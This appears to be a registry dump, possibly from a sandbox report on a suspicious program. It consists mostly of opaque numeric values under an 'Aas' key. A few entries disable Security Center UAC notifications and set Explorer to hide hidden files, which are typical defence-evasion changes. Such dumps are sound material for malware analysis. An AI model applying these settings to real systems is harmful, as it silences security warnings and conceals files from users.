"a4_552" = "3957354792"
"a1_753" = "2969640766"
"a4_824" = "1612388408"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Aas]
"a4_392" = "2810295432"
"a4_391" = "2803126311"
"a4_390" = "2795957190"
"a4_397" = "2846141037"
"a4_396" = "2838971916"
"a4_395" = "2831802795"
"a4_394" = "2824633674"
"a4_399" = "2860479279"
"a4_398" = "2853310158"
"a4_865" = "1906322369"
"a4_864" = "1899153248"
"a4_867" = "1920660611"
"a1_932" = "4272302750"
"a4_866" = "1913491490"
"a1_933" = "2636701689"
"a4_861" = "1877645885"
"a3_758" = "1122262303"
"a4_860" = "1870476764"
"a1_931" = "3072739185"
"a4_863" = "1891984127"
"a1_936" = "540751926"
"a4_862" = "1884815006"
"a1_937" = "1598610983"
"a2_405" = "2903495461"
"a2_404" = "2896327497"
"a2_407" = "2917826880"
"a2_406" = "2910660619"
"a2_401" = "2874813226"
"a2_400" = "2867655817"
"a2_403" = "2889164642"
"a2_402" = "2881994197"
"a1_935" = "4138801932"
"a2_409" = "2932163374"
"a2_408" = "2924997719"
"a2_975" = "2694933895"
"a2_974" = "2687762041"
"a2_977" = "2709271366"
"a2_976" = "2702088180"
"a2_971" = "2666245556"
"a2_970" = "2659076570"
"a2_973" = "2680592604"
"a4_896" = "2128565120"
"a2_979" = "2723596596"
"a2_978" = "2716427134"
"a1_222" = "1697862868"
"a1_223" = "2332371639"
"a1_220" = "728864114"
"a1_221" = "1054174184"
"a1_226" = "1211577199"
"a1_227" = "2719128626"
"a1_224" = "278714921"
"a1_225" = "678688826"
"a1_228" = "3834750495"
"a1_229" = "3690810648"
"a2_993" = "2823963030"
"a2_992" = "2816792231"
"a2_991" = "2809629413"
"a2_990" = "2802464842"
"a2_994" = "2831146629"
"a2_579" = "4150923508"
"a2_578" = "4143758513"
"a2_571" = "4093574177"
"a2_570" = "4086392821"
"a2_573" = "4107908666"
"a2_572" = "4100739841"
"a2_575" = "4122241032"
"a2_574" = "4115073259"
"a2_577" = "4136577315"
"a2_576" = "4129407405"
"a2_351" = "2516369194"
"a2_350" = "2509185927"
"a2_353" = "2530701948"
"a2_352" = "2523536871"
"a2_355" = "2545034446"
"a2_354" = "2537871531"
"a2_357" = "2559370466"
"a2_356" = "2552205252"
"a2_359" = "2573719732"
"a2_358" = "2566537237"
"a3_906" = "2183550307"
"a3_622" = "147491207"
"a2_193" = "1383644038"
"a2_192" = "1376473919"
"a2_191" = "1369294027"
"a2_190" = "1362127543"
"a2_197" = "1412311012"
"a2_196" = "1405142778"
"a2_195" = "1397976182"
"a2_194" = "1390809042"
"a3_624" = "195544665"
"a2_199" = "1426663100"
"a2_198" = "1419491622"
"a3_625" = "168917752"
"a2_759" = "1146389308"
"a3_626" = "175906587"
"a2_755" = "1117722216"
"a2_754" = "1110555765"
"a2_757" = "1132065518"
"a3_627" = "183481274"
"a2_751" = "1089040185"
"a2_750" = "1081872199"
"a2_753" = "1103388417"
"a2_752" = "1096204960"
"a1_536" = "3781296199"
"a1_537" = "1676928455"
"a1_534" = "3989900684"
"a1_535" = "1772206058"
"a1_89" = "2153058010"
"a1_88" = "184567349"
"a1_530" = "2519785980"
"a1_531" = "2067627139"
"a1_85" = "1475478120"
"a1_84" = "3885369117"
"a1_87" = "1804582497"
"a1_86" = "3379293925"
"a1_81" = "1910525049"
"a1_80" = "2646392066"
"a1_83" = "3612598821"
"a1_82" = "2057941209"
"a3_914" = "2274560123"
"a2_898" = "2142897778"
"a1_896" = "2640968174"
"a1_890" = "1379818723"
"a2_899" = "2150079436"
"a1_67" = "2810626750"
"a1_66" = "1853834819"
"a1_65" = "2546327511"
"a3_133" = "970345548"
"a1_63" = "2571357412"
"a3_135" = "950830350"
"a3_136" = "991836577"
"a1_60" = "1684438400"
"a3_138" = "1006335587"
"a3_139" = "979823234"
"a3_684" = "625694981"
"a1_438" = "1669362036"
"a3_682" = "577634371"
"a3_683" = "584688866"
"a1_69" = "3952531312"
"a1_68" = "1598359998"
"a3_228" = "1617824845"
"a3_229" = "1624875244"
"a3_224" = "1588903625"
"a3_225" = "1629901672"
"a3_226" = "1636956043"
"a3_227" = "1610836010"
"a3_220" = "1593911669"
"a3_221" = "1600966036"
"a3_222" = "1608410679"
"a3_223" = "1581849174"
"a1_408" = "1689397585"
"a1_409" = "750069319"
"a1_402" = "1793360672"
"a1_281" = "29460262"
"a1_400" = "936115268"
"a1_401" = "2602848335"
"a1_406" = "3499375817"
"a1_407" = "385072452"
"a1_404" = "586219311"
"a1_405" = "4291811275"
"a2_823" = "1605211008"
"a2_822" = "1598052761"
"a2_821" = "1590883277"
"a3_354" = "2521277451"
"a3_355" = "2528204970"
"a3_356" = "2568813773"
"a3_357" = "2576322924"
"a3_350" = "2492225207"
"a3_351" = "2499791574"
"a3_352" = "2540269385"
"a3_353" = "2547254248"
"a2_827" = "1633899258"
"a1_628" = "2943906745"
"a3_358" = "2583246223"
"a3_359" = "2556735022"
"a1_854" = "2437090083"
"a2_826" = "1626732833"
"a2_825" = "1619550440"
"a1_718" = "2879078320"
"a1_719" = "284737758"
"a1_716" = "772014111"
"a1_717" = "2531109333"
"a1_714" = "1494843184"
"a1_715" = "611845424"
"a1_712" = "404114822"
"a1_713" = "129097115"
"a1_710" = "175263834"
"a1_711" = "2881229524"
"a4_809" = "1504851593"
"a4_808" = "1497682472"
"a4_803" = "1461836867"
"a1_629" = "178037608"
"a4_801" = "1447498625"
"a4_800" = "1440329504"
"a4_807" = "1490513351"
"a4_806" = "1483344230"
"a4_805" = "1476175109"
"a4_804" = "1469005988"
"a4_37" = "265257477"
"a4_36" = "258088356"
"a4_35" = "250919235"
"a4_34" = "243750114"
"a4_33" = "236580993"
"a4_32" = "229411872"
"a4_31" = "222242751"
"a4_30" = "215073630"
"a4_144" = "1032353424"
"a4_39" = "279595719"
"a4_38" = "272426598"
"a3_915" = "2281614490"
"a4_843" = "1748601707"
"a3_142" = "1034864615"
"a4_946" = "2487021170"
"a4_947" = "2494190291"
"a4_944" = "2472682928"
"a4_945" = "2479852049"
"a4_942" = "2458344686"
"a4_943" = "2465513807"
"a4_940" = "2444006444"
"a4_941" = "2451175565"
"a4_948" = "2501359412"
[HKCU\Software\Aas\695404737]
"28676484" = "35"
[HKCU\Software\Aas]
"a4_498" = "3570222258"
"a4_499" = "3577391379"
"a4_494" = "3541545774"
"a4_495" = "3548714895"
"a4_496" = "3555884016"
"a4_497" = "3563053137"
"a4_490" = "3512869290"
"a4_491" = "3520038411"
"a4_492" = "3527207532"
"a4_493" = "3534376653"
"a3_448" = "3194799081"
"a3_449" = "3202245640"
"a2_941" = "2451170221"
"a4_708" = "780770372"
"a4_709" = "787939493"
"a3_918" = "2303105535"
"a3_919" = "2310025758"
"a4_704" = "752093888"
"a4_705" = "759263009"
"a4_706" = "766432130"
"a4_707" = "773601251"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_701" = "730586525"
"a4_702" = "737755646"
"a4_703" = "744924767"
"a1_888" = "1726509101"
"a1_889" = "3406862018"
"a1_886" = "4156922224"
"a1_887" = "3922849125"
"a1_884" = "243974972"
"a1_885" = "2953956587"
"a1_882" = "2304220271"
"a1_883" = "3403260960"
"a1_880" = "1818768461"
"a1_881" = "3620676750"
"a4_124" = "888971004"
"a4_125" = "896140125"
"a4_126" = "903309246"
"a4_127" = "910478367"
"a4_120" = "860294520"
"a4_121" = "867463641"
"a4_122" = "874632762"
"a4_123" = "881801883"
"a4_128" = "917647488"
"a4_129" = "924816609"
"a2_593" = "4251292123"
"a3_444" = "3166269973"
"a3_445" = "3206813364"
"a1_831" = "2792940417"
"a2_592" = "4244125435"
"a1_930" = "1809343181"
"a1_948" = "3516558345"
"a4_238" = "1706250798"
"a4_239" = "1713419919"
"a4_230" = "1648897830"
"a4_231" = "1656066951"
"a4_232" = "1663236072"
"a4_233" = "1670405193"
"a4_234" = "1677574314"
"a4_235" = "1684743435"
"a4_236" = "1691912556"
"a4_237" = "1699081677"
"a1_480" = "2819652031"
"a1_723" = "2985076650"
"a1_722" = "2914670029"
"a1_721" = "1090546917"
"a1_720" = "939116030"
"a1_768" = "1161393244"
"a1_727" = "1761764185"
"a1_726" = "3337465261"
"a2_643" = "314770726"
"a2_790" = "1368643001"
"a1_725" = "3097050339"
"a2_642" = "307603061"
"a1_724" = "2234995210"
"a2_641" = "300434344"
"a2_640" = "293269255"
"a2_647" = "343451624"
"a2_646" = "336287397"
"a1_158" = "4250421600"
"a1_159" = "3032160534"
"a2_645" = "329119478"
"a1_150" = "4164905401"
"a1_151" = "346538762"
"a1_152" = "1038566053"
"a1_153" = "2923469627"
"a1_154" = "346925284"
"a1_155" = "691156697"
"a1_156" = "1907331657"
"a1_157" = "2663427343"
"a1_235" = "2751356343"
"a1_234" = "1355660823"
"a1_237" = "4287470736"
"a1_236" = "1318848195"
"a1_231" = "34409378"
"a1_230" = "4149099775"
"a1_233" = "2461048126"
"a1_232" = "2555419590"
"a1_239" = "2204332961"
"a1_238" = "2445416036"
"a2_210" = "1505512980"
"a2_211" = "1512677778"
"a2_212" = "1519845775"
"a2_213" = "1527026266"
"a2_214" = "1534194675"
"a2_215" = "1541362678"
"a2_216" = "1548527355"
"a2_217" = "1555706656"
"a2_218" = "1562860507"
"a2_219" = "1570031907"
"a1_966" = "3424760658"
"a2_508" = "3641906355"
"a2_509" = "3649080602"
"a2_504" = "3613229980"
"a2_505" = "3620412598"
"a2_506" = "3627581346"
"a2_507" = "3634752577"
"a2_500" = "3584563131"
"a2_501" = "3591728843"
"a2_502" = "3598896084"
"a2_503" = "3606061647"
"a2_791" = "1375812956"
"a2_698" = "709078014"
"a2_699" = "716246722"
"a2_694" = "680397031"
"a2_695" = "687576671"
"a2_696" = "694746263"
"a2_697" = "701911738"
"a2_690" = "651727993"
"a2_691" = "658893060"
"a2_692" = "666061571"
"a2_693" = "673228528"
"a2_324" = "2322804494"
"a2_325" = "2329965262"
"a2_326" = "2337131967"
"a2_327" = "2344299316"
"a2_320" = "2294113601"
"a2_321" = "2301282895"
"a2_322" = "2308461910"
"a2_323" = "2315632451"
"a1_521" = "2724103127"
"a1_520" = "663081302"
"a1_523" = "247882614"
"a1_522" = "414806937"
"a2_328" = "2351466198"
"a2_329" = "2358647091"
"a1_527" = "235822516"
"a1_526" = "1939603844"
"a2_799" = "1433168016"
"a2_798" = "1425983077"
"a4_962" = "2601727106"
"a1_98" = "2197334354"
"a1_99" = "877027034"
"a1_92" = "3417203073"
"a1_93" = "2678459250"
"a1_90" = "3737006536"
"a1_91" = "2159601734"
"a1_96" = "1945451838"
"a1_97" = "2372398239"
"a1_94" = "748921032"
"a1_95" = "4129524421"
"a1_74" = "3055919783"
"a1_75" = "2025323376"
"a1_76" = "3951511568"
"a1_77" = "2431097687"
"a1_70" = "1749023192"
"a1_71" = "4171191198"
"a1_72" = "475022109"
"a1_73" = "3633798136"
"a3_699" = "733118194"
"a3_698" = "725670483"
"a3_129" = "907869896"
"a3_128" = "934369961"
"a1_78" = "285588128"
"a1_79" = "3334442424"
"a3_239" = "1730403494"
"a3_238" = "1689270279"
"a3_237" = "1682343908"
"a3_236" = "1708909381"
"a3_235" = "1701334818"
"a3_234" = "1660856963"
"a3_233" = "1653814880"
"a3_232" = "1646370241"
"a3_231" = "1672935854"
"a3_230" = "1665877263"
"a1_419" = "4164683133"
"a1_418" = "2088309724"
"a3_953" = "2520368944"
"a1_415" = "3895266945"
"a1_414" = "2108980362"
"a1_417" = "1061693774"
"a1_416" = "4226891513"
"a1_411" = "3864165760"
"a1_410" = "2843834766"
"a1_413" = "1200511010"
"a1_412" = "1041666117"
"a3_939" = "2419869154"
"a3_347" = "2504287570"
"a3_346" = "2463809843"
"a3_345" = "2456759440"
"a3_344" = "2482866289"
"a3_343" = "2475825118"
"a3_342" = "2468836287"
"a3_341" = "2427838236"
"a3_340" = "2420783869"
"a3_349" = "2485301780"
"a3_348" = "2511804917"
"a1_701" = "3107286467"
"a1_700" = "2561745409"
"a1_703" = "2269783569"
"a1_702" = "1943873600"
"a1_705" = "571934590"
"a1_704" = "2120472948"
"a1_707" = "2321671098"
"a1_706" = "460063535"
"a1_709" = "1130569431"
"a1_708" = "509000513"
"a2_360" = "2580887096"
"a4_838" = "1712756102"
"a2_361" = "2588061668"
"a4_836" = "1698417860"
"a4_837" = "1705586981"
"a4_834" = "1684079618"
"a4_835" = "1691248739"
"a4_832" = "1669741376"
"a2_362" = "2595220181"
"a4_830" = "1655403134"
"a4_831" = "1662572255"
"a4_24" = "172058904"
"a4_25" = "179228025"
"a4_26" = "186397146"
"a4_27" = "193566267"
"a4_20" = "143382420"
"a4_21" = "150551541"
"a4_22" = "157720662"
"a4_23" = "164889783"
"a4_951" = "2522866775"
"a2_364" = "2609553612"
"a4_953" = "2537205017"
"a4_952" = "2530035896"
"a4_28" = "200735388"
"a4_29" = "207904509"
"a4_957" = "2565881501"
"a2_365" = "2616723647"
"a2_366" = "2623905761"
"a2_367" = "2631071754"
"a1_743" = "1887053530"
"a2_168" = "1204405843"
"a2_169" = "1211585110"
"a4_847" = "1777278191"
"a4_489" = "3505700169"
"a4_488" = "3498531048"
"a4_487" = "3491361927"
"a4_486" = "3484192806"
"a4_485" = "3477023685"
"a4_484" = "3469854564"
"a4_483" = "3462685443"
"a4_482" = "3455516322"
"a4_481" = "3448347201"
"a4_480" = "3441178080"
"a2_160" = "1147051639"
"a4_973" = "2680587437"
"a2_161" = "1154234101"
"a4_977" = "2709263921"
"a4_972" = "2673418316"
"a4_971" = "2666249195"
"a3_901" = "2147558220"
"a3_900" = "2174193453"
"a3_903" = "2162063374"
"a3_902" = "2154612719"
"a3_905" = "2209657024"
"a3_904" = "2202606753"
"a4_719" = "859630703"
"a4_718" = "852461582"
"a4_717" = "845292461"
"a4_716" = "838123340"
"a4_715" = "830954219"
"a4_714" = "823785098"
"a4_713" = "816615977"
"a4_712" = "809446856"
"a4_711" = "802277735"
"a4_710" = "795108614"
"a1_891" = "1631329103"
"a3_776" = "1251683361"
"a1_893" = "784550923"
"a1_892" = "2627712134"
"a1_895" = "1041336267"
"a1_894" = "1069844185"
"a1_897" = "2322242613"
"a3_777" = "1292288064"
"a1_899" = "508583449"
"a1_898" = "511146253"
"a4_974" = "2687756558"
"a3_774" = "1270749039"
"a4_137" = "982169577"
"a4_136" = "975000456"
"a4_135" = "967831335"
"a4_134" = "960662214"
"a4_133" = "953493093"
"a4_132" = "946323972"
"a4_131" = "939154851"
"a4_130" = "931985730"
"a3_772" = "1222762157"
"a4_139" = "996507819"
"a4_138" = "989338698"
"a4_975" = "2694925679"
"a3_770" = "1208254955"
"a3_771" = "1215707658"
"a2_455" = "3261953343"
"a1_617" = "2611428864"
"a4_229" = "1641728709"
"a4_228" = "1634559588"
"a4_223" = "1598713983"
"a4_222" = "1591544862"
"a4_221" = "1584375741"
"a4_220" = "1577206620"
"a4_227" = "1627390467"
"a4_226" = "1620221346"
"a4_225" = "1613052225"
"a4_224" = "1605883104"
"a1_615" = "3339368793"
"a2_459" = "3290620076"
"a3_678" = "548713167"
"a1_614" = "1953332760"
"a1_820" = "3069423840"
"a1_821" = "1830246570"
"a1_822" = "3072133451"
"a1_149" = "17671467"
"a1_148" = "1832140104"
"a1_143" = "106027243"
"a1_142" = "1520800629"
"a1_141" = "1778917173"
"a1_140" = "3825668026"
"a1_147" = "3312589158"
"a1_146" = "628198402"
"a1_145" = "3802423937"
"a1_144" = "2858977314"
"a1_826" = "2109132756"
"a1_827" = "981766117"
"a2_203" = "1455329080"
"a2_202" = "1448159685"
"a2_201" = "1440990642"
"a2_200" = "1433826919"
"a2_207" = "1484011448"
"a2_206" = "1476843736"
"a2_205" = "1469675751"
"a2_204" = "1462493414"
"a2_209" = "1498343518"
"a2_208" = "1491178145"
"a2_519" = "3720780994"
"a2_518" = "3713599066"
"a2_517" = "3706432652"
"a2_516" = "3699275349"
"a2_515" = "3692088562"
"a2_514" = "3684932949"
"a2_513" = "3677762794"
"a2_512" = "3670596652"
"a2_511" = "3663415996"
"a2_510" = "3656245669"
"a2_689" = "644549180"
"a2_688" = "637394320"
"a2_687" = "630225840"
"a2_686" = "623046014"
"a2_685" = "615888822"
"a2_684" = "608710538"
"a2_683" = "601550506"
"a2_682" = "594375261"
"a2_681" = "587210643"
"a2_680" = "580041891"
"a2_337" = "2415999798"
"a2_336" = "2408817461"
"a2_335" = "2401650592"
"a2_334" = "2394484028"
"a2_333" = "2387316518"
"a2_332" = "2380151534"
"a2_331" = "2372980811"
"a2_330" = "2365800640"
"a1_554" = "3349610808"
"a1_555" = "2134000695"
"a1_556" = "2381122013"
"a1_557" = "3295115192"
"a3_242" = "1718323611"
"a1_551" = "1377688478"
"a2_339" = "2430334434"
"a2_338" = "2423169013"
"a4_673" = "529851137"
"a1_918" = "2424912414"
"a1_919" = "2484379630"
"a3_243" = "1725243962"
"a1_852" = "124100507"
"a1_914" = "1140304364"
"a1_398" = "4081065631"
"a1_399" = "131082258"
"a4_679" = "572865863"
"a1_392" = "1002438747"
"a1_393" = "2413094997"
"a1_390" = "2482137491"
"a1_391" = "11634558"
"a1_396" = "517715575"
"a1_397" = "3481333174"
"a1_394" = "872282885"
"a1_395" = "3696671095"
"a1_858" = "1631589699"
"a3_116" = "814879197"
"a3_117" = "821922428"
"a3_114" = "834001179"
"a3_115" = "807894458"
"a3_112" = "785940569"
"a3_113" = "826942712"
"a3_110" = "771902343"
"a3_111" = "778955814"
"a1_49" = "2435481947"
"a1_48" = "2981631336"
"a3_554" = "3988280259"
"a3_118" = "862924447"
"a3_119" = "869974846"
"a3_202" = "1465015971"
"a3_203" = "1472066242"
"a3_200" = "1416954337"
"a3_201" = "1424013824"
"a3_206" = "1493543975"
"a3_207" = "1500987462"
"a3_204" = "1445500773"
"a3_205" = "1452936068"
"a1_197" = "302335216"
"a3_759" = "1163391422"
"a3_208" = "1508041977"
"a3_209" = "1481480472"
"a3_592" = "4261104249"
"a3_593" = "4234604184"
"a3_590" = "4246617511"
"a3_591" = "4253667782"
"a3_596" = "4289649661"
"a3_597" = "4263017500"
"a3_594" = "4241589051"
"a3_595" = "4282591066"
"a3_598" = "4270526655"
"a3_599" = "4277581022"
"a4_848" = "1784447312"
"a3_578" = "4160735531"
"a3_579" = "4134104394"
"a4_770" = "1225255874"
"a3_570" = "4069660115"
"a3_571" = "4076703346"
"a3_572" = "4117701269"
"a3_573" = "4124755764"
"a3_574" = "4098128727"
"a3_575" = "4105641974"
"a3_576" = "4146245737"
"a3_577" = "4153169032"
"a1_774" = "2476487416"
"a1_775" = "3157274098"
"a1_776" = "3729111734"
"a1_777" = "2538396187"
"a1_191" = "4157591957"
"a1_771" = "1601776510"
"a1_772" = "2467964831"
"a1_773" = "3436073051"
"a1_953" = "1270748759"
"a3_927" = "2367492374"
"a1_778" = "961778820"
"a1_779" = "3624902882"
"a3_926" = "2326953207"
"a2_17" = "121877384"
"a2_16" = "114711734"
"a2_15" = "107542671"
"a2_14" = "100361458"
"a2_13" = "93195914"
"a2_12" = "86026473"
"a2_11" = "78858807"
"a2_10" = "71694322"
"a4_829" = "1648234013"
"a4_828" = "1641064892"
"a4_776" = "1268270600"
"a1_592" = "245252358"
"a2_19" = "136210735"
"a2_18" = "129046401"
"a4_11" = "78860331"
"a4_10" = "71691210"
"a4_13" = "93198573"
"a4_12" = "86029452"
"a4_15" = "107536815"
"a4_14" = "100367694"
"a4_17" = "121875057"
"a4_16" = "114705936"
"a4_19" = "136213299"
"a4_18" = "129044178"
"a4_926" = "2343638750"
"a4_927" = "2350807871"
"a1_878" = "1184625151"
"a4_921" = "2307793145"
"a4_922" = "2314962266"
"a1_595" = "407962333"
"a1_596" = "1450277516"
"a4_987" = "2780955131"
"a1_597" = "3407142639"
"a1_608" = "1866556539"
"a1_609" = "3732552317"
"a3_378" = "2693094675"
"a3_379" = "2700145074"
"a4_846" = "1770109070"
"a3_372" = "2683746013"
"a3_373" = "2657102716"
"a3_370" = "2669182491"
"a3_371" = "2676691642"
"a3_376" = "2712142929"
"a3_377" = "2686171376"
"a3_374" = "2664681375"
"a3_375" = "2705154110"
"a1_759" = "1701358265"
"a3_488" = "3515101889"
"a3_489" = "3522680672"
"a4_841" = "1734263465"
"a4_840" = "1727094344"
"a1_950" = "3410890411"
"a3_484" = "3486690637"
"a1_952" = "507976207"
"a2_925" = "2336467872"
"a1_954" = "1324212678"
"a1_955" = "2473960878"
"a1_956" = "2462016830"
"a3_485" = "3460055532"
"a1_958" = "3953326916"
"a2_922" = "2314968461"
"a1_750" = "1163331228"
"a1_751" = "2243276449"
"a1_756" = "1337025626"
"a1_757" = "2183051651"
"a4_722" = "881138066"
"a4_723" = "888307187"
"a4_720" = "866799824"
"a1_661" = "4101970729"
"a4_726" = "909814550"
"a4_727" = "916983671"
"a4_724" = "895476308"
"a4_725" = "902645429"
"a4_728" = "924152792"
"a4_729" = "931321913"
"a3_978" = "2699694267"
"a3_979" = "2740303066"
"a3_127" = "927442486"
"a1_189" = "3928029867"
"a4_903" = "2178748967"
"a1_188" = "666204546"
"a4_900" = "2157241604"
"a1_187" = "3861311338"
"a4_901" = "2164410725"
"a1_186" = "1891755722"
"a2_929" = "2365150037"
"a4_905" = "2193087209"
"a4_586" = "4201104906"
"a4_587" = "4208274027"
"a4_584" = "4186766664"
"a4_585" = "4193935785"
"a4_582" = "4172428422"
"a4_583" = "4179597543"
"a4_580" = "4158090180"
"a4_581" = "4165259301"
"a3_800" = "1423623433"
"a3_801" = "1464105384"
"a3_802" = "1471618507"
"a3_803" = "1445115498"
"a3_804" = "1452026509"
"a3_805" = "1459605292"
"a4_588" = "4215443148"
"a4_589" = "4222612269"
"a3_645" = "312377932"
"a4_909" = "2221763693"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKCU\Software\Aas]
"a4_966" = "2630403590"
"a4_218" = "1562868378"
"a4_219" = "1570037499"
"a4_216" = "1548530136"
"a4_217" = "1555699257"
"a4_214" = "1534191894"
"a4_215" = "1541361015"
"a4_212" = "1519853652"
"a4_213" = "1527022773"
"a4_210" = "1505515410"
"a4_211" = "1512684531"
"a4_458" = "3283457418"
"a4_459" = "3290626539"
"a4_108" = "774265068"
"a4_109" = "781434189"
"a1_843" = "4188578610"
"a4_102" = "731250342"
"a4_103" = "738419463"
"a4_100" = "716912100"
"a4_101" = "724081221"
"a4_106" = "759926826"
"a4_107" = "767095947"
"a4_104" = "745588584"
"a4_105" = "752757705"
"a1_605" = "3218039797"
"a1_558" = "1577893396"
"a1_559" = "1580383126"
"a1_606" = "1900390487"
"a3_925" = "2319505492"
"a1_178" = "2180300380"
"a1_179" = "3996885725"
"a1_176" = "819821214"
"a1_177" = "3604557228"
"a1_174" = "1168857504"
"a1_175" = "1602631248"
"a1_172" = "3141924510"
"a1_173" = "3725528916"
"a1_170" = "243996688"
"a1_171" = "22812050"
"a1_550" = "142737436"
"a2_236" = "1691915190"
"a2_237" = "1699073434"
"a2_234" = "1677580893"
"a2_235" = "1684748386"
"a2_232" = "1663233423"
"a2_233" = "1670412675"
"a2_230" = "1648898135"
"a2_231" = "1656064921"
"a1_553" = "3107006708"
"a2_238" = "1706248057"
"a2_239" = "1713416753"
"a2_522" = "3742283342"
"a2_523" = "3749447821"
"a2_520" = "3727949675"
"a2_521" = "3735114942"
"a2_526" = "3770951801"
"a2_527" = "3778133739"
"a2_524" = "3756617497"
"a2_525" = "3763782715"
"a2_838" = "1712752273"
"a2_839" = "1719917258"
"a2_528" = "3785304087"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Aas]
"a3_688" = "620670617"
"a1_626" = "2515070792"
"a1_627" = "1356612822"
"a1_624" = "2039272743"
"a1_549" = "739988663"
"a1_548" = "3363137265"
"a1_547" = "3226568191"
"a1_546" = "3639109714"
"a1_545" = "2142890170"
"a1_544" = "2054830568"
"a1_543" = "1288414408"
"a1_542" = "2475116768"
"a1_541" = "270667172"
"a1_540" = "3940050757"
"a2_658" = "422321933"
"a2_659" = "429490090"
"a2_308" = "2208095553"
"a2_309" = "2215264142"
"a2_302" = "2165067684"
"a2_303" = "2172244818"
"a2_300" = "2150695931"
"a2_301" = "2157913031"
"a2_306" = "2193745325"
"a2_307" = "2200925917"
"a2_304" = "2179409074"
"a2_305" = "2186578484"
"a2_786" = "1339954200"
"a2_787" = "1347125572"
"a2_784" = "1325626207"
"a2_785" = "1332795158"
"a2_782" = "1311291760"
"a2_783" = "1318458126"
"a2_780" = "1296944976"
"a2_781" = "1304111042"
"a2_788" = "1354291875"
"a2_789" = "1361462130"
"a1_389" = "2240673979"
"a1_388" = "1513921886"
"a1_385" = "2008986284"
"a1_384" = "3717002203"
"a1_387" = "638331032"
"a1_386" = "684541491"
"a1_381" = "1681334575"
"a1_380" = "3076709016"
"a1_383" = "3064238"
"a1_382" = "2172749025"
"a1_58" = "1568413605"
"a1_59" = "589765179"
"a1_56" = "3052013710"
"a1_57" = "3319990861"
"a1_54" = "1148483149"
"a1_55" = "3825902595"
"a1_52" = "527995160"
"a1_53" = "3735036578"
"a1_50" = "1651195275"
"a1_51" = "76265448"
"a3_215" = "1524377438"
"a3_214" = "1517454143"
"a3_217" = "1572437008"
"a3_216" = "1565514737"
"a3_211" = "1529532890"
"a3_210" = "1488928187"
"a3_213" = "1510469276"
"a3_212" = "1536445053"
"a1_616" = "2159277526"
"a3_748" = "1050812741"
"a3_219" = "1553446098"
"a3_218" = "1545867443"
"a3_585" = "4177070976"
"a3_584" = "4170159969"
"a3_587" = "4225122370"
"a3_586" = "4217678883"
"a3_581" = "4182227468"
"a3_580" = "4141089261"
"a3_583" = "4162646734"
"a3_582" = "4189150895"
"a3_589" = "4205615364"
"a3_588" = "4198622437"
"a3_893" = "2090093684"
"a3_569" = "4062671280"
"a3_568" = "4088782097"
"a3_563" = "4052790138"
"a3_562" = "4045747931"
"a3_561" = "4005270200"
"a3_560" = "3997761049"
"a3_567" = "4081727742"
"a3_566" = "4040721503"
"a3_565" = "4033732668"
"a3_564" = "4026683293"
"a3_109" = "798021476"
"a3_108" = "790966981"
"a1_765" = "2972257135"
"a1_764" = "1636297049"
"a1_763" = "1259093698"
"a1_762" = "2834068242"
"a1_761" = "3333735464"
"a3_724" = "878479485"
"a3_101" = "707522668"
"a3_100" = "733503437"
"a3_103" = "754977070"
"a3_102" = "714511503"
"a3_105" = "769475040"
"a3_104" = "762555713"
"a3_107" = "750493346"
"a3_106" = "742980099"
"a4_854" = "1827462038"
"a4_855" = "1834631159"
"a4_856" = "1841800280"
"a3_726" = "926531903"
"a4_850" = "1798785554"
"a4_851" = "1805954675"
"a4_852" = "1813123796"
"a4_853" = "1820292917"
"a3_721" = "890560280"
"a2_914" = "2257601029"
"a4_858" = "1856138522"
"a1_586" = "2891085136"
"a1_789" = "3054542244"
"a3_720" = "849951481"
"a4_393" = "2817464553"
"a3_898" = "2126083691"
"a3_723" = "904992730"
"a4_939" = "2436837323"
"a4_938" = "2429668202"
"a4_937" = "2422499081"
"a4_936" = "2415329960"
"a4_935" = "2408160839"
"a3_722" = "898003899"
"a4_933" = "2393822597"
"a4_932" = "2386653476"
"a4_931" = "2379484355"
"a4_930" = "2372315234"
"a3_955" = "2568364018"
"a1_788" = "2040568148"
"a1_619" = "3250009310"
"a1_618" = "3717696090"
"a3_369" = "2628699640"
"a3_368" = "2621645145"
"a3_365" = "2600170596"
"a3_364" = "2592723909"
"a3_367" = "2647756070"
"a3_366" = "2640767111"
"a3_361" = "2604787424"
"a3_360" = "2564178497"
"a3_363" = "2585673634"
"a3_362" = "2611780355"
"a4_520" = "3727942920"
"a4_521" = "3735112041"
"a1_584" = "1055098869"
"a4_522" = "3742281162"
"a2_62" = "444487833"
"a4_523" = "3749450283"
"a2_63" = "451653007"
"a4_524" = "3756619404"
"a1_971" = "4174754513"
"a2_60" = "430150046"
"a4_525" = "3763788525"
"a1_943" = "3037499394"
"a1_942" = "2469986207"
"a1_941" = "1088355478"
"a2_61" = "437318299"
"a1_947" = "3435074974"
"a4_526" = "3770957646"
"a1_945" = "3539251043"
"a1_944" = "866347230"
"a2_66" = "473169908"
"a1_949" = "3627104204"
"a4_527" = "3778126767"
"a2_67" = "480334474"
"a2_64" = "458832075"
"a2_65" = "465986192"
"a4_735" = "974336639"
"a4_734" = "967167518"
"a4_737" = "988674881"
"a4_736" = "981505760"
"a4_731" = "945660155"
"a4_730" = "938491034"
"a4_733" = "959998397"
"a4_732" = "952829276"
"a4_739" = "1003013123"
"a4_738" = "995844002"
"a3_969" = "2668861696"
"a3_968" = "2627790049"
"a4_599" = "4294303479"
"a4_598" = "4287134358"
"a1_782" = "1276249120"
"a4_591" = "4236950511"
"a4_590" = "4229781390"
"a4_593" = "4251288753"
"a4_592" = "4244119632"
"a4_595" = "4265626995"
"a4_594" = "4258457874"
"a4_597" = "4279965237"
"a4_596" = "4272796116"
"a1_786" = "1227018080"
"a1_41" = "1595305539"
"a1_40" = "1426961046"
"a1_43" = "367074832"
"a3_819" = "1559971962"
"a1_42" = "1366797527"
"a3_813" = "1516544548"
"a1_45" = "273932487"
"a3_811" = "1536136546"
"a3_810" = "1528623299"
"a3_817" = "1545483192"
"a3_816" = "1571594009"
"a3_815" = "1564605158"
"a1_44" = "57155867"
"a1_47" = "1868932753"
"a1_46" = "592080607"
"a4_201" = "1440993321"
"a4_200" = "1433824200"
